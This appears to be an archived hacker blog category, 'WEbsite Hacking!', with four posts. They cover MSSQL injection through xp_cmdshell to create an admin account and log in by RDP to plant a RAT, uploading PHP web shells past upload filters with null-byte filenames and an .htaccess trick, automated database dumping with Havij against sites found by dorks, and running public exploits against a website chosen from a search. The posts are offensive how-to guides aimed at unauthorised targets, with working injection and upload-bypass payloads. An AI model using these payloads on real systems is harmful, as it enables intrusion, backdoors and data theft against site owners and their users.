Archive

Archive for the ‘WEbsite Hacking!’ Category

r00ting/RDP A windows Box via MSSQL Injection

April 4, 2011 Leave a comment

# Check if the privileges are ‘dbo’ which means database 0wn3r !!
example-
=> www.target.com/news.asp?id=1
Query- www.target.com/news.asp?id=convert(int,(select+user))–
^^ If it shows something Like ‘dbo’ means u can r00t it !!

Next step is

# adding a user account-
for this => www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net user shubham hacker /add’;–
//here uname=shubham and passwd=hacker..u can change it !!!

# Next step is adding to admins group

for this => www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net localgroup administrators shubham /add’;–

Done !! :) )

now open run, type mstsc and hit enter !!
then write the ip of the server !!

Login screen will come..
type uname=Shubham
passwd= hacker
oe whatever is urs…

You are in !!! :)
place your RAT or whatever u want…your choice….
THE END !! :)

// credits : cyb3r_shubh4m

Categories: WEbsite Hacking!

How To Upload A Shell

March 2, 2011 Leave a comment

 

:D :D :D :D :D :D

How to Upload a Shell

First of all, when uploading a shell, you MUST be able to problem solve. Some of the techniques I have compiled in this guide aren’t exactly easy for most of you.

I am separating this guide into steps, and sometimes, this won’t always work. In fact, most of the time (If the coder was that bright at all), these techniques will NOT work. So don’t go posting away about it not working for you on one site..

First though, you need some form of upload script. I don’t care if it’s a public upload script, or one off an admin page.

Step 1
First off, try the shell with the regular php extension. I’ve seen this work for admin panels a lot of the time, because the coder doesn’t think anyone but the site admin will be messing with it.. He doesn’t stop to think about security.

Step 2
If step 1 doesn’t work, you’re going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null to make it work.

Examples:

Code:
shell.php.jpg%00
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;%00
shell.php.jpg%00;
shell.php.jpg%00:;

Step 3
Now on to step 3, it seems that step 2 didn’t work for you. Sometimes, (now this is occasional), the file extensions it will accept are in the source of the page itself.. this is most common for java uploaders and similar. So to check for this, obviously view the source of the page and check it over for anything that looks like file extensions. If you do find any, you are going to want to use a tool like Firebug (Addon for Firefox), to edit the source to include the extension "php".

Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, ect. scripts from being uploaded. The best way to counter-act this is to upload a .htaccess file. Go into notepad or w/e and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the wierd extension.

Step 5
Last but not least, is the header modification trick. This one is a little complicated (Will add pics in a min..) To do this, you need something like the Tamper Data addon for Firefox. In this example, I’ll use that addon. What you want to do is after you attempt to send the post data, tamper the data before it sends. Then you will want to scroll through the raw data until you find the header data.. let’s say our header is Application/Data… you would want to change that to something appropriate to the scripts intended purpose, like Image/Jpeg for an image upload script.

That concludes my guide for how to upload a shell for now, will add more to it later, and of course, adding pictures later as well. (Decided not to on this one) As for now, enjoy!

Categories: WEbsite Hacking! Tags: , , , , ,

Massive Website Hacking

October 9, 2010 2 comments

Hello friends!!
Herez my brand new short and n00b friendly tutorial on massive website hacking !
Tools required:
1: Reiluk scanner[exploit scanner] :: Get it from HERE

2: Havij: Get It From HERE

Lets start it..
Type a dork in exploit scanner and hit scan scan sites

1

a

Wait till it finishes scanning.. now press test sites

b

Select a vulnerable site from test sites list and remove the [ ' ] apostrophe
After installing havij open it up and put the above selected vulnerable in havij in target box and hit analyze

2

Wait till it finishes and hit get tables

3

Now you have full access to the database, choose a column and press Get data .

FINISH!! Njoy 

Categories: WEbsite Hacking!

Hacking a Website

May 15, 2010 1 comment

First of all you need a target website. (Google & find one)

Once you’ve got it, plug into this website.

http://www.selfseo.com/find_ip_address_of_a_website.php

Once you’ve done that, it’ll split out its IP address.

Next thing you need to do is find out is, it online or offline. (Ping)
Go to http://www.just-ping.com & ping the IP obtained in last step.
Observe the results from ping. (Okay means online)

Now, we need to gather information about the website. (Whois lookup)
Go to http://whois.domaintools.com & plug up the IP or the website.
You’ll see a large amount of information about the website.
Use Google to find even more information about the website.

Once you’re done download, install & open Nmap.
Once you have done that, do a –sT –sV scan of the website.
[That is put, nmap –sT –sV, in Nmap’s command bar & scan website.]
Once done, observe open OS, ports, services running on the website server.]

Once done, you’ll need to find banner of the software.
[Banner: It shows the software & version running on ports.]
Methods depend on the OS of the server.

For WIN VISTA & 7:

You need to download & Open Netcat.
[Because Telnet is disabled in WIN VISTA & 7]

Once done type, nc
Ex: nc 127.0.0.1 21
Once you’ve done that, you’ll get a banner.
This will be displaying all the details of the software running on port.

For other OS:

Open Telnet
[Start > RUN > telnet]

Once done type, O
Ex: O 127.0.0.1 21
Once you’ve done that, you’ll get a banner.
This will be displaying all the details of the software running on port.
If this doesn’t work you can try the first method.

Once you’ve got the banner, you need to search for vulnerability matching with banner.

Exploit databases:

Milw0rm: http://www.milw0rm.com
Security Focus: http://www.securityfocus.com
Osvdb: http://www.osvdb.org
Cve Mitre: http://cve.mitre.org
Metasploit: http://www.metasploit.com

Once you’ve got the matching exploit of the same version software.
[If you haven’t got, try another port.]
You need to edit values, compile & run it.

Most common exploit Coders:

Perl

For perl exploits, Copy the exploit in notepad & save it with .pl extension.
Download & Install, Active Perl: http://www.activestate.com/activeperl
Once done, edit the exploit with notepad & double click to run it.

PHP

For PHP exploits, copy & save it in .php extension.
Download & Install WAMP: http://www.wampserver.com/en/
Once done, edit the exploit with notepad & execute it from CMD.

Python

For python exploits, copy & save it in .py extension.
Download & Install python: http://www.python.org/download
Once done, edit the exploit with notepad & double click to run it.

C/C++

For C/C++ exploits, copy & save it in notepad.
Download & Install Blood Shed. (Google the link)
Once done, edit the exploit, compile & double click to run it.

If your exploit is successful you will get access to server,
You’ll be able to edit every part of the website.
If your exploit wasn’t successful try with different port, services & software.
You can also use Metasploit web to search exploits.

Good Luck !

Categories: WEbsite Hacking!
Follow

Get every new post delivered to your Inbox.

Join 38 other followers